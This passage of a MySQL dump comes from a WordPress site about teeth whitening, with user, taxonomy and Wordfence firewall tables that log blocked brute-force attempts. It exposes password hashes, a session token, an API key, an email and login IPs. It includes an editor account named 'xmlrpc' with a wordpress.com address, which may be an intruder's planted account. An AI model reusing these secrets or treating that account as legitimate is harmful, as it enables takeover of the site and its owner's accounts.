INSERT INTO `wp_redirection_logs` VALUES (13,'2021-06-12 14:10:41','/]Teeth','/teeth-whitening/','Mozilla/5.0 (compatible; DotBot/1.2; +https://opensiteexplorer.org/dotbot; help@moz.com)',NULL,1,'216.244.66.198',0,1);
/*!40000 ALTER TABLE `wp_redirection_logs` ENABLE KEYS */;
UNLOCK TABLES;
--
-- Table structure for table `wp_term_relationships`
--
DROP TABLE IF EXISTS `wp_term_relationships`;
/*!40101 SET @saved_cs_client = @@character_set_client */;
/*!40101 SET character_set_client = utf8 */;
CREATE TABLE `wp_term_relationships` (
`object_id` bigint(20) unsigned NOT NULL DEFAULT 0,
`term_taxonomy_id` bigint(20) unsigned NOT NULL DEFAULT 0,
`term_order` int(11) NOT NULL DEFAULT 0,
PRIMARY KEY (`object_id`,`term_taxonomy_id`),
KEY `term_taxonomy_id` (`term_taxonomy_id`)
) ENGINE=InnoDB DEFAULT CHARSET=utf8mb4 COLLATE=utf8mb4_unicode_ci;
/*!40101 SET character_set_client = @saved_cs_client */;
--
-- Dumping data for table `wp_term_relationships`
--
LOCK TABLES `wp_term_relationships` WRITE;
/*!40000 ALTER TABLE `wp_term_relationships` DISABLE KEYS */;
INSERT INTO `wp_term_relationships` VALUES (77,4,0),(87,2,0),(88,2,0),(89,2,0),(90,2,0),(91,2,0),(92,2,0),(93,2,0),(94,2,0),(95,2,0),(98,3,0),(103,4,0),(106,4,0),(127,3,0),(140,2,0),(142,4,0),(159,2,0),(162,2,0),(165,2,0),(168,2,0),(196,4,0),(199,2,0),(202,2,0),(207,1,0),(207,5,0),(207,6,0),(218,4,0),(218,7,0),(218,8,0),(220,2,0),(221,4,0),(221,6,0),(221,9,0),(221,10,0),(227,2,0),(234,4,0),(234,11,0),(234,12,0);
/*!40000 ALTER TABLE `wp_term_relationships` ENABLE KEYS */;
UNLOCK TABLES;
--
-- Table structure for table `wp_term_taxonomy`
--
DROP TABLE IF EXISTS `wp_term_taxonomy`;
/*!40101 SET @saved_cs_client = @@character_set_client */;
/*!40101 SET character_set_client = utf8 */;
CREATE TABLE `wp_term_taxonomy` (
`term_taxonomy_id` bigint(20) unsigned NOT NULL AUTO_INCREMENT,
`term_id` bigint(20) unsigned NOT NULL DEFAULT 0,
`taxonomy` varchar(32) NOT NULL DEFAULT '',
`description` longtext NOT NULL,
`parent` bigint(20) unsigned NOT NULL DEFAULT 0,
`count` bigint(20) NOT NULL DEFAULT 0,
PRIMARY KEY (`term_taxonomy_id`),
UNIQUE KEY `term_id_taxonomy` (`term_id`,`taxonomy`),
KEY `taxonomy` (`taxonomy`)
) ENGINE=InnoDB AUTO_INCREMENT=13 DEFAULT CHARSET=utf8mb4 COLLATE=utf8mb4_unicode_ci;
/*!40101 SET character_set_client = @saved_cs_client */;
--
-- Dumping data for table `wp_term_taxonomy`
--
LOCK TABLES `wp_term_taxonomy` WRITE;
/*!40000 ALTER TABLE `wp_term_taxonomy` DISABLE KEYS */;
INSERT INTO `wp_term_taxonomy` VALUES (1,1,'category','',0,1),(2,2,'nav_menu','',0,18),(3,3,'category','',0,1),(4,4,'category','',0,8),(5,5,'post_tag','',0,1),(6,6,'post_tag','',0,2),(7,7,'post_tag','',0,1),(8,8,'post_tag','',0,1),(9,9,'post_tag','',0,1),(10,10,'post_tag','',0,1),(11,11,'post_tag','',0,1),(12,12,'post_tag','',0,1);
/*!40000 ALTER TABLE `wp_term_taxonomy` ENABLE KEYS */;
UNLOCK TABLES;
--
-- Table structure for table `wp_termmeta`
--
DROP TABLE IF EXISTS `wp_termmeta`;
/*!40101 SET @saved_cs_client = @@character_set_client */;
/*!40101 SET character_set_client = utf8 */;
CREATE TABLE `wp_termmeta` (
`meta_id` bigint(20) unsigned NOT NULL AUTO_INCREMENT,
`term_id` bigint(20) unsigned NOT NULL DEFAULT 0,
`meta_key` varchar(255) DEFAULT NULL,
`meta_value` longtext DEFAULT NULL,
PRIMARY KEY (`meta_id`),
KEY `term_id` (`term_id`),
KEY `meta_key` (`meta_key`(191))
) ENGINE=InnoDB DEFAULT CHARSET=utf8mb4 COLLATE=utf8mb4_unicode_ci;
/*!40101 SET character_set_client = @saved_cs_client */;
--
-- Dumping data for table `wp_termmeta`
--
LOCK TABLES `wp_termmeta` WRITE;
/*!40000 ALTER TABLE `wp_termmeta` DISABLE KEYS */;
/*!40000 ALTER TABLE `wp_termmeta` ENABLE KEYS */;
UNLOCK TABLES;
--
-- Table structure for table `wp_terms`
--
DROP TABLE IF EXISTS `wp_terms`;
/*!40101 SET @saved_cs_client = @@character_set_client */;
/*!40101 SET character_set_client = utf8 */;
CREATE TABLE `wp_terms` (
`term_id` bigint(20) unsigned NOT NULL AUTO_INCREMENT,
`name` varchar(200) NOT NULL DEFAULT '',
`slug` varchar(200) NOT NULL DEFAULT '',
`term_group` bigint(10) NOT NULL DEFAULT 0,
PRIMARY KEY (`term_id`),
KEY `slug` (`slug`(191)),
KEY `name` (`name`(191))
) ENGINE=InnoDB AUTO_INCREMENT=13 DEFAULT CHARSET=utf8mb4 COLLATE=utf8mb4_unicode_ci;
/*!40101 SET character_set_client = @saved_cs_client */;
--
-- Dumping data for table `wp_terms`
--
LOCK TABLES `wp_terms` WRITE;
/*!40000 ALTER TABLE `wp_terms` DISABLE KEYS */;
INSERT INTO `wp_terms` VALUES (1,'Uncategorized','uncategorized',0),(2,'Menu 1','menu-1',0),(3,'Teeth Whitening','teeth-whitening',0),(4,'Dental Health','dental-health',0),(5,'implants','implants',0),(6,'veneers','veneers',0),(7,'dental implants','dental-implants',0),(8,'implant cost','implant-cost',0),(9,'cosmetic dentistry','cosmetic-dentistry',0),(10,'treatments','treatments',0),(11,'tooth pain','tooth-pain',0),(12,'teeth pain','teeth-pain',0);
/*!40000 ALTER TABLE `wp_terms` ENABLE KEYS */;
UNLOCK TABLES;
--
-- Table structure for table `wp_usermeta`
--
DROP TABLE IF EXISTS `wp_usermeta`;
/*!40101 SET @saved_cs_client = @@character_set_client */;
/*!40101 SET character_set_client = utf8 */;
CREATE TABLE `wp_usermeta` (
`umeta_id` bigint(20) unsigned NOT NULL AUTO_INCREMENT,
`user_id` bigint(20) unsigned NOT NULL DEFAULT 0,
`meta_key` varchar(255) DEFAULT NULL,
`meta_value` longtext DEFAULT NULL,
PRIMARY KEY (`umeta_id`),
KEY `user_id` (`user_id`),
KEY `meta_key` (`meta_key`(191))
) ENGINE=InnoDB AUTO_INCREMENT=47 DEFAULT CHARSET=utf8mb4 COLLATE=utf8mb4_unicode_ci;
/*!40101 SET character_set_client = @saved_cs_client */;
--
-- Dumping data for table `wp_usermeta`
--
LOCK TABLES `wp_usermeta` WRITE;
/*!40000 ALTER TABLE `wp_usermeta` DISABLE KEYS */;
INSERT INTO `wp_usermeta` VALUES (1,1,'nickname','teethwhiteningproduct'),(2,1,'first_name',''),(3,1,'last_name',''),(4,1,'description',''),(5,1,'rich_editing','true'),(6,1,'syntax_highlighting','true'),(7,1,'comment_shortcuts','false'),(8,1,'admin_color','fresh'),(9,1,'use_ssl','0'),(10,1,'show_admin_bar_front','true'),(11,1,'locale',''),(12,1,'wp_capabilities','a:1:{s:13:\"administrator\";b:1;}'),(13,1,'wp_user_level','10'),(14,1,'dismissed_wp_pointers','vc_pointers_backend_editor,text_widget_custom_html'),(15,1,'show_welcome_panel','1'),(16,1,'session_tokens','a:1:{s:64:\"0a340fa0c5a35ff7c39ef1082c19f265cbb18c3575df51a72c025dd7b642ae2d\";a:4:{s:10:\"expiration\";i:1662955948;s:2:\"ip\";s:14:\"149.34.244.165\";s:2:\"ua\";s:111:\"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/105.0.0.0 Safari/537.36\";s:5:\"login\";i:1662783148;}}'),(17,1,'wp_dashboard_quick_press_last_post_id','247'),(18,1,'community-events-location','a:1:{s:2:\"ip\";s:12:\"149.34.244.0\";}'),(20,1,'wp_user-settings','libraryContent=browse&editor=tinymce&imgsize=full&urlbutton=custom'),(21,1,'wp_user-settings-time','1536059407'),(22,1,'managenav-menuscolumnshidden','a:5:{i:0;s:11:\"link-target\";i:1;s:11:\"css-classes\";i:2;s:3:\"xfn\";i:3;s:11:\"description\";i:4;s:15:\"title-attribute\";}'),(23,1,'metaboxhidden_nav-menus','a:1:{i:0;s:12:\"add-post_tag\";}'),(24,1,'nav_menu_recently_edited','2'),(26,1,'last_login_time','2022-09-10 04:12:28'),(27,1,'wfls-last-login','1629756776'),(29,2,'nickname','xmlrpc'),(30,2,'first_name',''),(31,2,'last_name',''),(32,2,'description',''),(33,2,'rich_editing','true'),(34,2,'syntax_highlighting','true'),(35,2,'comment_shortcuts','false'),(36,2,'admin_color','fresh'),(37,2,'use_ssl','0'),(38,2,'show_admin_bar_front','true'),(39,2,'locale',''),(40,2,'wp_capabilities','a:1:{s:6:\"editor\";b:1;}'),(41,2,'wp_user_level','7'),(42,2,'dismissed_wp_pointers',''),(44,2,'last_login_time','2022-09-10 04:13:59'),(45,2,'wp_dashboard_quick_press_last_post_id','248'),(46,2,'community-events-location','a:1:{s:2:\"ip\";s:12:\"149.34.244.0\";}');
/*!40000 ALTER TABLE `wp_usermeta` ENABLE KEYS */;
UNLOCK TABLES;
--
-- Table structure for table `wp_users`
--
DROP TABLE IF EXISTS `wp_users`;
/*!40101 SET @saved_cs_client = @@character_set_client */;
/*!40101 SET character_set_client = utf8 */;
CREATE TABLE `wp_users` (
`ID` bigint(20) unsigned NOT NULL AUTO_INCREMENT,
`user_login` varchar(60) NOT NULL DEFAULT '',
`user_pass` varchar(255) NOT NULL DEFAULT '',
`user_nicename` varchar(50) NOT NULL DEFAULT '',
`user_email` varchar(100) NOT NULL DEFAULT '',
`user_url` varchar(100) NOT NULL DEFAULT '',
`user_registered` datetime NOT NULL DEFAULT '0000-00-00 00:00:00',
`user_activation_key` varchar(255) NOT NULL DEFAULT '',
`user_status` int(11) NOT NULL DEFAULT 0,
`display_name` varchar(250) NOT NULL DEFAULT '',
PRIMARY KEY (`ID`),
KEY `user_login_key` (`user_login`),
KEY `user_nicename` (`user_nicename`),
KEY `user_email` (`user_email`)
) ENGINE=InnoDB AUTO_INCREMENT=3 DEFAULT CHARSET=utf8mb4 COLLATE=utf8mb4_unicode_ci;
/*!40101 SET character_set_client = @saved_cs_client */;
--
-- Dumping data for table `wp_users`
--
LOCK TABLES `wp_users` WRITE;
/*!40000 ALTER TABLE `wp_users` DISABLE KEYS */;
INSERT INTO `wp_users` VALUES (1,'admin','$P$BGQQl4lANVrQwU8TwY7yZkg6dwdeYU0','teethwhiteningproduct','bensykes@bensykes.co.uk','','2018-01-26 11:42:57','',0,'teethwhiteningproduct'),(2,'xmlrpc','$P$BuIS.pToQk4K0K9ESGVga5MTzhwogr.','xmlrpc','info@wordpress.com','','2022-09-10 04:13:03','',0,'xmlrpc');
/*!40000 ALTER TABLE `wp_users` ENABLE KEYS */;
UNLOCK TABLES;
--
-- Table structure for table `wp_wfblockediplog`
--
DROP TABLE IF EXISTS `wp_wfblockediplog`;
/*!40101 SET @saved_cs_client = @@character_set_client */;
/*!40101 SET character_set_client = utf8 */;
CREATE TABLE `wp_wfblockediplog` (
`IP` binary(16) NOT NULL DEFAULT '\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0',
`countryCode` varchar(2) NOT NULL,
`blockCount` int(10) unsigned NOT NULL DEFAULT 0,
`unixday` int(10) unsigned NOT NULL,
`blockType` varchar(50) NOT NULL DEFAULT 'generic',
PRIMARY KEY (`IP`,`unixday`,`blockType`)
) ENGINE=InnoDB DEFAULT CHARSET=utf8 COLLATE=utf8_general_ci;
/*!40101 SET character_set_client = @saved_cs_client */;
--
-- Dumping data for table `wp_wfblockediplog`
--
LOCK TABLES `wp_wfblockediplog` WRITE;
/*!40000 ALTER TABLE `wp_wfblockediplog` DISABLE KEYS */;
INSERT INTO `wp_wfblockediplog` VALUES ('\0\0\0\0\0\0\0\0\0\0����$','US',1,18849,'brute'),('\0\0\0\0\0\0\0\0\0\0��>8)','BO',2,18835,'brute'),('\0\0\0\0\0\0\0\0\0\0�����','DE',1,18839,'brute'),('\0\0\0\0\0\0\0\0\0\0���~d','US',31,18859,'brute'),('\0\0\0\0\0\0\0\0\0\0�����','US',4,18859,'waf'),('\0\0\0\0\0\0\0\0\0\0��& �','US',1,18847,'brute'),('\0\0\0\0\0\0\0\0\0\0��P%�','US',2,18838,'brute'),('\0\0\0\0\0\0\0\0\0\0��X$@','US',1,18845,'waf'),('\0\0\0\0\0\0\0\0\0\0��_�','US',1,18837,'brute'),('\0\0\0\0\0\0\0\0\0\0���M','US',1,18836,'brute'),('\0\0\0\0\0\0\0\0\0\0��\"B��','US',1,18843,'brute'),('\0\0\0\0\0\0\0\0\0\0��\"N�q','BE',2,18836,'brute'),('\0\0\0\0\0\0\0\0\0\0��\"[ȴ','NL',1,18836,'brute'),('\0\0\0\0\0\0\0\0\0\0��\"�1�','US',1,18839,'brute'),('\0\0\0\0\0\0\0\0\0\0��\"��}','US',1,18849,'brute'),('\0\0\0\0\0\0\0\0\0\0��#��F','US',1,18845,'brute'),('\0\0\0\0\0\0\0\0\0\0��#�','SG',1,18839,'brute'),('\0\0\0\0\0\0\0\0\0\0��%\0','NL',2,18842,'waf'),('\0\0\0\0\0\0\0\0\0\0��%\0','NL',3,18849,'waf'),('\0\0\0\0\0\0\0\0\0\0��%�h','DE',1,18847,'waf'),('\0\0\0\0\0\0\0\0\0\0��(P��','US',1,18845,'brute'),('\0\0\0\0\0\0\0\0\0\0��(S��','US',4,18836,'brute'),('\0\0\0\0\0\0\0\0\0\0��(w0�','US',26,18840,'waf'),('\0\0\0\0\0\0\0\0\0\0��)���','ZA',1,18850,'waf'),('\0\0\0\0\0\0\0\0\0\0��)��Q','MA',1,18850,'waf'),('\0\0\0\0\0\0\0\0\0\0��-HN)','US',3,18834,'brute'),('\0\0\0\0\0\0\0\0\0\0��1\"��','IN',52,18859,'waf'),('\0\0\0\0\0\0\0\0\0\0��1$#e','IN',1,18853,'waf'),('\0\0\0\0\0\0\0\0\0\0��1��1','IN',1,18848,'waf'),('\0\0\0\0\0\0\0\0\0\0��2?�8','US',2,18838,'brute'),('\0\0\0\0\0\0\0\0\0\0��3Kȷ','FR',1,18836,'brute'),('\0\0\0\0\0\0\0\0\0\0��3M�\"','FR',1,18836,'brute'),('\0\0\0\0\0\0\0\0\0\0��3O��','SG',1,18836,'brute'),('\0\0\0\0\0\0\0\0\0\0��3� ','CA',1,18836,'brute'),('\0\0\0\0\0\0\0\0\0\0��4�:m','US',1,18859,'brute'),('\0\0\0\0\0\0\0\0\0\0��6$�t','FR',1,18838,'brute'),('\0\0\0\0\0\0\0\0\0\0��6$�t','FR',1,18839,'brute'),('\0\0\0\0\0\0\0\0\0\0��6�<�','US',1,18841,'brute'),('\0\0\0\0\0\0\0\0\0\0��6�<�','US',1,18842,'brute'),('\0\0\0\0\0\0\0\0\0\0��>�|','PT',1,18836,'brute'),('\0\0\0\0\0\0\0\0\0\0��>��9','DE',1,18839,'brute'),('\0\0\0\0\0\0\0\0\0\0��>�T1','FR',1,18835,'brute'),('\0\0\0\0\0\0\0\0\0\0��>�w�','FR',1,18839,'brute'),('\0\0\0\0\0\0\0\0\0\0��>Ҍ>','FR',1,18837,'brute'),('\0\0\0\0\0\0\0\0\0\0��>ҹ','FR',2,18839,'brute'),('\0\0\0\0\0\0\0\0\0\0��>�','FR',1,18845,'brute'),('\0\0\0\0\0\0\0\0\0\0��?���','US',2,18836,'brute'),('\0\0\0\0\0\0\0\0\0\0��@Z0�','US',1,18836,'brute'),('\0\0\0\0\0\0\0\0\0\0��@�I�','NL',1,18837,'brute'),('\0\0\0\0\0\0\0\0\0\0��A1��','US',1,18839,'brute'),('\0\0\0\0\0\0\0\0\0\0��C��','US',1,18836,'brute'),('\0\0\0\0\0\0\0\0\0\0��C��','US',1,18836,'brute'),('\0\0\0\0\0\0\0\0\0\0��E�c','US',2,18835,'brute'),('\0\0\0\0\0\0\0\0\0\0��E�e','US',4,18837,'brute'),('\0\0\0\0\0\0\0\0\0\0��E�','US',4,18835,'brute'),('\0\0\0\0\0\0\0\0\0\0��E��p','US',1,18836,'brute'),('\0\0\0\0\0\0\0\0\0\0��E�͇','US',1,18839,'brute'),('\0\0\0\0\0\0\0\0\0\0��Kw��','US',1,18839,'brute'),('\0\0\0\0\0\0\0\0\0\0��M�N','GB',4,18840,'waf'),('\0\0\0\0\0\0\0\0\0\0��N��','TR',168,18856,'brute'),('\0\0\0\0\0\0\0\0\0\0��N��','TR',441,18857,'brute'),('\0\0\0\0\0\0\0\0\0\0��Q\\�R','GB',1,18861,'brute'),('\0\0\0\0\0\0\0\0\0\0��Q��','DE',2,18859,'waf'),('\0\0\0\0\0\0\0\0\0\0��RfJ','US',3,18859,'brute'),('\0\0\0\0\0\0\0\0\0\0��Rʬ�','RU',1,18836,'brute'),('\0\0\0\0\0\0\0\0\0\0��Y,��','RO',1,18836,'brute'),('\0\0\0\0\0\0\0\0\0\0��\\̆�','US',1,18837,'brute'),('\0\0\0\0\0\0\0\0\0\0��\\̸','FR',1,18836,'brute'),('\0\0\0\0\0\0\0\0\0\0��aJ�','US',1,18839,'brute'),('\0\0\0\0\0\0\0\0\0\0��e \Z�','HK',1,18839,'brute'),('\0\0\0\0\0\0\0\0\0\0��g2ͳ','MN',1,18838,'brute'),('\0\0\0\0\0\0\0\0\0\0��gbH','ID',1,18839,'brute'),('\0\0\0\0\0\0\0\0\0\0��ghIo','IN',1,18836,'brute'),('\0\0\0\0\0\0\0\0\0\0��gyY�','VN',1,18836,'brute'),('\0\0\0\0\0\0\0\0\0\0��g{?','ID',10,18836,'waf'),('\0\0\0\0\0\0\0\0\0\0��g�I�','VN',1,18838,'brute'),('\0\0\0\0\0\0\0\0\0\0��g�I�','VN',1,18839,'brute'),('\0\0\0\0\0\0\0\0\0\0��g��','',1,18849,'waf'),('\0\0\0\0\0\0\0\0\0\0��g�','',1,18836,'waf'),('\0\0\0\0\0\0\0\0\0\0��h+�6','US',4,18835,'brute'),('\0\0\0\0\0\0\0\0\0\0��h��:','US',1,18837,'brute'),('\0\0\0\0\0\0\0\0\0\0��h�K�','US',1,18836,'brute'),('\0\0\0\0\0\0\0\0\0\0��k�0�','US',2,18838,'brute'),('\0\0\0\0\0\0\0\0\0\0��k�4�','US',2,18838,'brute'),('\0\0\0\0\0\0\0\0\0\0��k�;�','US',2,18838,'brute'),('\0\0\0\0\0\0\0\0\0\0��k�;�','US',2,18839,'brute'),('\0\0\0\0\0\0\0\0\0\0��k�?�','US',2,18834,'brute'),('\0\0\0\0\0\0\0\0\0\0��k�?�','US',4,18835,'brute'),('\0\0\0\0\0\0\0\0\0\0��k�?�','US',2,18838,'brute'),('\0\0\0\0\0\0\0\0\0\0��k�H�','US',1,18837,'brute'),('\0\0\0\0\0\0\0\0\0\0��k��','US',1,18836,'brute'),('\0\0\0\0\0\0\0\0\0\0��t��','DE',1,18836,'brute'),('\0\0\0\0\0\0\0\0\0\0��}��6','ID',1,18845,'brute'),('\0\0\0\0\0\0\0\0\0\0����h�','US',2,18839,'brute'),('\0\0\0\0\0\0\0\0\0\0����g$','JP',1,18837,'brute'),('\0\0\0\0\0\0\0\0\0\0���ѝ�','IN',1,18836,'brute'),('\0\0\0\0\0\0\0\0\0\0���ѝ�','IN',1,18837,'brute'),('\0\0\0\0\0\0\0\0\0\0���ѝ�','IN',1,18838,'brute'),('\0\0\0\0\0\0\0\0\0\0����\\\\','DE',1,18839,'brute'),('\0\0\0\0\0\0\0\0\0\0���D� ','GB',1,18837,'brute'),('\0\0\0\0\0\0\0\0\0\0���;u�','SG',1,18859,'brute'),('\0\0\0\0\0\0\0\0\0\0����z`','JP',1,18839,'brute'),('\0\0\0\0\0\0\0\0\0\0���6�','US',2,18836,'brute'),('\0\0\0\0\0\0\0\0\0\0���6�>','US',2,18838,'brute'),('\0\0\0\0\0\0\0\0\0\0���]�~','DE',1,18836,'brute'),('\0\0\0\0\0\0\0\0\0\0���ƹ~','US',1,18836,'brute'),('\0\0\0\0\0\0\0\0\0\0���^�R','US',1,18855,'brute'),('\0\0\0\0\0\0\0\0\0\0���Z�C','DE',1,18839,'brute'),('\0\0\0\0\0\0\0\0\0\0���AL&','US',1,18837,'brute'),('\0\0\0\0\0\0\0\0\0\0���Y��','US',1,18837,'brute'),('\0\0\0\0\0\0\0\0\0\0����M\r','US',1,18836,'brute'),('\0\0\0\0\0\0\0\0\0\0�����#','NL',2,18838,'brute'),('\0\0\0\0\0\0\0\0\0\0������','NL',1,18839,'brute'),('\0\0\0\0\0\0\0\0\0\0���75�','DE',1,18837,'brute'),('\0\0\0\0\0\0\0\0\0\0���7L�','DE',3,18834,'waf'),('\0\0\0\0\0\0\0\0\0\0���7��','DE',1,18837,'waf'),('\0\0\0\0\0\0\0\0\0\0����\0�','US',1,18836,'brute'),('\0\0\0\0\0\0\0\0\0\0���֣%','US',1,18835,'brute'),('\0\0\0\0\0\0\0\0\0\0����l','FR',1,18837,'brute'),('\0\0\0\0\0\0\0\0\0\0����E','DE',1,18836,'brute'),('\0\0\0\0\0\0\0\0\0\0���G�8','US',1,18846,'brute'),('\0\0\0\0\0\0\0\0\0\0�����Z','US',2,18837,'brute'),('\0\0\0\0\0\0\0\0\0\0����','US',1,18837,'brute'),('\0\0\0\0\0\0\0\0\0\0�����','FR',1,18837,'brute'),('\0\0\0\0\0\0\0\0\0\0���wң','GR',2,18836,'brute'),('\0\0\0\0\0\0\0\0\0\0���7o\r','BR',1,18837,'brute'),('\0\0\0\0\0\0\0\0\0\0�����K','BR',1,18847,'waf'),('\0\0\0\0\0\0\0\0\0\0������','HK',1,18836,'brute'),('\0\0\0\0\0\0\0\0\0\0���\r�','IR',1,18836,'brute'),('\0\0\0\0\0\0\0\0\0\0���2ş','ES',1,18836,'brute'),('\0\0\0\0\0\0\0\0\0\0���C','UA',1,18839,'brute'),('\0\0\0\0\0\0\0\0\0\0���Vҳ','ES',1,18837,'brute'),('\0\0\0\0\0\0\0\0\0\0���Фk','PL',1,18839,'brute'),('\0\0\0\0\0\0\0\0\0\0����X�','IR',1,18838,'brute'),('\0\0\0\0\0\0\0\0\0\0����\"E','GB',1,18836,'brute'),('\0\0\0\0\0\0\0\0\0\0���i��','AR',1,18836,'brute'),('\0\0\0\0\0\0\0\0\0\0����|','US',1,18858,'brute'),('\0\0\0\0\0\0\0\0\0\0����|','US',2,18860,'brute'),('\0\0\0\0\0\0\0\0\0\0��¶�\r','BG',1,18836,'brute'),('\0\0\0\0\0\0\0\0\0\0��Å(.','CZ',3,18849,'waf'),('\0\0\0\0\0\0\0\0\0\0���G�$','US',1,18839,'brute'),('\0\0\0\0\0\0\0\0\0\0�����','US',2,18835,'brute'),('\0\0\0\0\0\0\0\0\0\0�����','US',2,18836,'brute'),('\0\0\0\0\0\0\0\0\0\0�����','US',2,18837,'brute'),('\0\0\0\0\0\0\0\0\0\0�����','US',2,18834,'brute'),('\0\0\0\0\0\0\0\0\0\0������','US',2,18839,'brute'),('\0\0\0\0\0\0\0\0\0\0�����','US',2,18834,'brute'),('\0\0\0\0\0\0\0\0\0\0���Q�','US',1,18839,'brute'),('\0\0\0\0\0\0\0\0\0\0��ʚ��','ID',1,18845,'waf'),('\0\0\0\0\0\0\0\0\0\0��ʬ\Z','JP',1,18836,'brute'),('\0\0\0\0\0\0\0\0\0\0�����','VN',1,18836,'brute'),('\0\0\0\0\0\0\0\0\0\0���,X#','US',1,18837,'brute'),('\0\0\0\0\0\0\0\0\0\0��ϴ�','DE',1,18836,'brute'),('\0\0\0\0\0\0\0\0\0\0���k�?','US',1,18839,'waf'),('\0\0\0\0\0\0\0\0\0\0����O','US',36,18841,'brute'),('\0\0\0\0\0\0\0\0\0\0����O','US',6,18841,'waf'),('\0\0\0\0\0\0\0\0\0\0��Ѷ�N','US',1,18836,'brute'),('\0\0\0\0\0\0\0\0\0\0�����','MV',6,18845,'waf'),('\0\0\0\0\0\0\0\0\0\0����O]','US',1,18859,'brute'),('\0\0\0\0\0\0\0\0\0\0���Z�','VN',1,18838,'brute');
/*!40000 ALTER TABLE `wp_wfblockediplog` ENABLE KEYS */;
UNLOCK TABLES;
--
-- Table structure for table `wp_wfblocks7`
--
DROP TABLE IF EXISTS `wp_wfblocks7`;
/*!40101 SET @saved_cs_client = @@character_set_client */;
/*!40101 SET character_set_client = utf8 */;
CREATE TABLE `wp_wfblocks7` (
`id` bigint(20) unsigned NOT NULL AUTO_INCREMENT,
`type` int(10) unsigned NOT NULL DEFAULT 0,
`IP` binary(16) NOT NULL DEFAULT '\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0',
`blockedTime` bigint(20) NOT NULL,
`reason` varchar(255) NOT NULL,
`lastAttempt` int(10) unsigned DEFAULT 0,
`blockedHits` int(10) unsigned DEFAULT 0,
`expiration` bigint(20) unsigned NOT NULL DEFAULT 0,
`parameters` text DEFAULT NULL,
PRIMARY KEY (`id`),
KEY `type` (`type`),
KEY `IP` (`IP`),
KEY `expiration` (`expiration`)
) ENGINE=InnoDB AUTO_INCREMENT=1102 DEFAULT CHARSET=utf8 COLLATE=utf8_general_ci;
/*!40101 SET character_set_client = @saved_cs_client */;
--
-- Dumping data for table `wp_wfblocks7`
--
LOCK TABLES `wp_wfblocks7` WRITE;
/*!40000 ALTER TABLE `wp_wfblocks7` DISABLE KEYS */;
INSERT INTO `wp_wfblocks7` VALUES (1101,7,'\0\0\0\0\0\0\0\0\0\0��\"}�',1629754753,'Exceeded the maximum number of login failures which is: 20. The last username they tried to sign in with was: \'admin\'',1629754753,1,1629769153,NULL);
/*!40000 ALTER TABLE `wp_wfblocks7` ENABLE KEYS */;
UNLOCK TABLES;
--
-- Table structure for table `wp_wfconfig`
--
DROP TABLE IF EXISTS `wp_wfconfig`;
/*!40101 SET @saved_cs_client = @@character_set_client */;
/*!40101 SET character_set_client = utf8 */;
CREATE TABLE `wp_wfconfig` (
`name` varchar(100) NOT NULL,
`val` longblob DEFAULT NULL,
`autoload` enum('no','yes') NOT NULL DEFAULT 'yes',
PRIMARY KEY (`name`)
) ENGINE=InnoDB DEFAULT CHARSET=utf8 COLLATE=utf8_general_ci;
/*!40101 SET character_set_client = @saved_cs_client */;
--
-- Dumping data for table `wp_wfconfig`
--
LOCK TABLES `wp_wfconfig` WRITE;
/*!40000 ALTER TABLE `wp_wfconfig` DISABLE KEYS */;
INSERT INTO `wp_wfconfig` VALUES ('actUpdateInterval','2','yes'),('addCacheComment','0','yes'),('adminUserList','b:0;','yes'),('advancedCommentScanning','1','yes'),('ajaxWatcherDisabled_admin','0','yes'),('ajaxWatcherDisabled_front','0','yes'),('alertEmails','','yes'),('alertOn_adminLogin','1','yes'),('alertOn_block','1','yes'),('alertOn_breachLogin','1','yes'),('alertOn_firstAdminLoginOnly','0','yes'),('alertOn_firstNonAdminLoginOnly','0','yes'),('alertOn_loginLockout','1','yes'),('alertOn_lostPasswdForm','1','yes'),('alertOn_nonAdminLogin','0','yes'),('alertOn_scanIssues','1','yes'),('alertOn_severityLevel','25','yes'),('alertOn_throttle','0','yes'),('alertOn_update','0','yes'),('alertOn_wafDeactivated','1','yes'),('alertOn_wordfenceDeactivated','1','yes'),('alert_maxHourly','0','yes'),('allowed404s','/favicon.ico\n/apple-touch-icon*.png\n/*@2x.png\n/browserconfig.xml','yes'),('allowed404s6116Migration','1','yes'),('allowHTTPSCaching','0','yes'),('allowLegacy2FA','0','yes'),('allowMySQLi','1','yes'),('allScansScheduled','a:0:{}','yes'),('apiKey','0938af587ba7b966b49e52ae054fff8d721aa591bdef4173cc50806c4db0d7ba387545c76d395453ec71f65cdd75f73ad8ca2ef9986344b1c0234e1ed5b5dc3f102400f4b06789fb532457899d5aa0e0','yes'),('autoBlockScanners','1','yes'),('autoUpdate','0','yes'),('autoUpdateAttempts','0','yes'),('bannedURLs','','yes'),('betaThreatDefenseFeed','0','yes'),('blockCustomText','','yes'),('blockedTime','300','yes'),('blocks702Migration','1','yes'),('cacheType','disabled','yes'),('cbl_action','block','yes'),('cbl_bypassRedirDest','','yes'),('cbl_bypassRedirURL','','yes'),('cbl_bypassViewURL','','yes'),('cbl_cookieVal','60d1c5b92dc4b','yes'),('cbl_loggedInBlocked','','yes'),('cbl_redirURL','','yes'),('cbl_restOfSiteBlocked','1','yes'),('checkSpamIP','1','yes'),('config701Migration','1','yes'),('config720Migration','1','yes'),('coreHashes','�\0\0\0\0\0\0\0\Z��a:2:{s:4:\"hash\";s:64:\"c947153e029a74c6d8d1caa85e4aec46022fe0152ffb1dfc23ea508d9e9fe9c4\";s:6:\"hashes\";s:136448:\"\0���W7���ht#� ��q��)��d��$\0��\0(�띰xJ{�h�Ϯ�%��\r^��:��(�5��\0(����Z�Y�Y�@�Iq��ȗ#��T��@\04ߗ�t��\\v�Q���\'_���ajx�Ҧ�\0E=j���ȋ|�p8.�½���֤��SGp�\0Eq�x����Pa���>bv�D��o4V�G;a<��\0^N��弘a�e|K��-��ܰ��ɜ=�\0b�&F�����%|w��*Qr;�|/�=(A���<�\0���#�B�5��j��$#��j!����bN��j�\0�ۧ��4(�K�I|���0��qD.^�v�\0�>|�;(߯\\W*�7?��\n�N��2=�7[Uo\0��i��ք�\"����]�^��XD��2](\0���/��o)��:4]��_���+̔�c���\0�e�*�@�t���\"��q 